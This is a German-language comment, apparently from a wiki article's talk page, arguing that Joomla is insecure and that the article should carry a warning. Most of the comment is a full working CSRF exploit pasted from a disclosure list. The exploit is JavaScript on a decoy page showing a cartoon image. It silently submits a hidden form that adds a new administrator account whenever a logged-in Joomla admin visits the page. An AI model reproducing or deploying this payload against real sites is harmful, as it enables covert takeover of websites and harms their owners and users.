Vielleicht sollte man in den Artikel noch reinschreiben, dass Joomla absoluter Schrott ist? Und das ganz objektiv gesehen. Es vergeht keine Woche in der auf FD keine Lücke dazu gepostet wird. Erst vor zwei Tagen kam ne CRSF rein die einzusätzliches Admin-Konto erstellt:
If a logged in administrator visits this page a new administrator will be added to the victim's
Joomla powered website.
---- exploit code ----
<script type="text/javascript">
window.onload = function() {
var url = "http://joomlasite.com/joomla/administrator/index2.php";
var gid = 25;
var user = 'custom_username';
var pass = 'custom_password';
var email = 'joe_cool@example.com';
var param = {
name: user,
username: user,
email: email,
password: pass,
password2: pass,
gid: gid,
block: 0,
option: 'com_users',
task: 'save',
sendEmail: 1
};
var form = document.createElement('form');
form.action = url;
form.method = 'post';
form.target = 'hidden';
form.style.display = 'none';
for (var i in param) {
try {
// ie
var input = document.createElement('<input name="'+i+'">');
} catch(e) {
// other browsers
var input = document.createElement('input');
input.name = i;
}
input.setAttribute('value', param[i]);
form.appendChild(input);
}
document.body.appendChild(form);
form.submit();
}
</script>
<iframe name="hidden" style="display: none"></iframe>
<img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg">
---- exploit code ----Auch milw0rm zählt unzählige exploits dafür... Joomla ist kacke und sollte imo von niemandem benutzt werden. Vielleicht eine Hinweis-Box, dass sich Joomla in der Vergangenheit sehr anfällig für Sicherheitslücken erwiesen hat?
